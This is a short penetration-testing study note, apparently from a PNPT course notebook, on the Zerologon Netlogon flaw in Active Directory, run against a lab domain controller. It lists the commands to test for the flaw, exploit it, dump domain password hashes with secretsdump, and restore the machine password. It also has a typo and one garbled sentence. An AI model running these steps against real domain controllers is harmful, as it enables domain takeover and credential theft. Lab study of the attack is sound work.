Zerologon

Overview

The Zerologon vulnerability allows for attackers to manipulate authentication mechanisms in Microsoft’s Active Directory Netlogon Remote Protocol and compromise the Domain Controller.

We are essentially the Domain Controller authentication to null so we can authenticate without a password.

This vulnerability can BREAK the Domain Controller so exploiting it in a real engagement shouldn't be done

Now here's how to do it :D

Zerologon Attack

First check if the Domain Controller is vulnerable with this script

./zerologon_tester.py PNPT-DC 192.168.1.129

Exploit the vulnerability with this script then dump hashes

python3 cve-2020-1472-exploit.py PNPT-DC 192.168.1.129
imapcket-secretsdump -just-dc PNPT/PNPT-DC\$@192.168.1.129

Restore Domain Controller back to normal 

python3 restorepassword.py PNPT/PNPT-DC@PNPT-DC -target-ip 192.168.1.129 -hexpass XXX
hex value needed to restore the Domain Controller
PreviousCritical Active Directory CVE'sNextPrintNightmare